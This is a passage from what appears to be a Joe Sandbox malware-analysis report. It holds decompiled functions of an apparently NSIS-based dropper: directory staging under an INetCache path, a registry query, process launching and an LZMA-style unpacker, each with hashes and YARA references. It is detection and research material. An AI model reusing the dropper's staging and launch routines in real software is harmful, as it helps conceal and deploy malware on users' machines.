                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp
                                                          • API String ID: 2655323295-1924618205
                                                          • Opcode ID: f9d37ecf99ac56edafcaa2f1cd47f4937662206fa3ab36d745cd74ad20f42250
                                                          • Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
                                                          • Opcode Fuzzy Hash: f9d37ecf99ac56edafcaa2f1cd47f4937662206fa3ab36d745cd74ad20f42250
                                                          • Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C37(0xfffffff0);
				_t17 = E00405BC8(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405B4A(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E004057FC( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E00405819(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E0040577F( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624C(L"C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                          0x004015c1
                                                          0x004015c9
                                                          0x004015cc
                                                          0x004015d1
                                                          0x004015d5
                                                          0x004015d7
                                                          0x004015df
                                                          0x004015e1
                                                          0x004015e4
                                                          0x004015ea
                                                          0x00401604
                                                          0x00401607
                                                          0x004015ec
                                                          0x004015ec
                                                          0x004015ef
                                                          0x00000000
                                                          0x004015fa
                                                          0x004015fd
                                                          0x004015fd
                                                          0x004015ef
                                                          0x0040160e
                                                          0x00401615
                                                          0x00401624
                                                          0x00401624
                                                          0x00401617
                                                          0x0040161a
                                                          0x00401622
                                                          0x00000000
                                                          0x00000000
                                                          0x00401622
                                                          0x00401615
                                                          0x00401627
                                                          0x0040162b
                                                          0x0040162c
                                                          0x004015d7
                                                          0x00401634
                                                          0x00401663
                                                          0x00402245
                                                          0x00401636
                                                          0x00401638
                                                          0x00401645
                                                          0x0040164d
                                                          0x00401655
                                                          0x0040165b
                                                          0x0040165b
                                                          0x00401655
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                            • Part of subcall function 00405BC8: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,?,00405C3C,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,?,?,74D0FAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00000000), ref: 00405BD6
                                                            • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                                            • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                            • Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,?,00000000,000000F0), ref: 0040164D
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 00401640
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth
                                                          • API String ID: 1892508949-868909127
                                                          • Opcode ID: be059b02de55be546dd79f47ecb03ede3c1f21afff9b80660869a8e6f73aef5a
                                                          • Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
                                                          • Opcode Fuzzy Hash: be059b02de55be546dd79f47ecb03ede3c1f21afff9b80660869a8e6f73aef5a
                                                          • Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040611A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E0040611A(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004060B9(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20); // executed
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                          0x00406128
                                                          0x0040612a
                                                          0x00406142
                                                          0x00406147
                                                          0x0040614c
                                                          0x0040618a
                                                          0x0040618a
                                                          0x0040614e
                                                          0x00406160
                                                          0x0040616b
                                                          0x00406171
                                                          0x0040617c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040617c
                                                          0x00406190

                                                          APIs
                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,0040638E,80000002), ref: 00406160
                                                          • RegCloseKey.KERNELBASE(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll), ref: 0040616B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                          • Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
                                                          • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                          • Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405831(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4266f0->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x4266f0,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                          0x0040583a
                                                          0x0040585a
                                                          0x00405862
                                                          0x00405867
                                                          0x00000000
                                                          0x0040586d
                                                          0x00405871

                                                          APIs
                                                          Strings
                                                          • Error launching installer, xrefs: 00405844
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                          • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                                          • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                          • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 99%
                                                          			E00406D8B() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004071F9))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4)); // executed
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
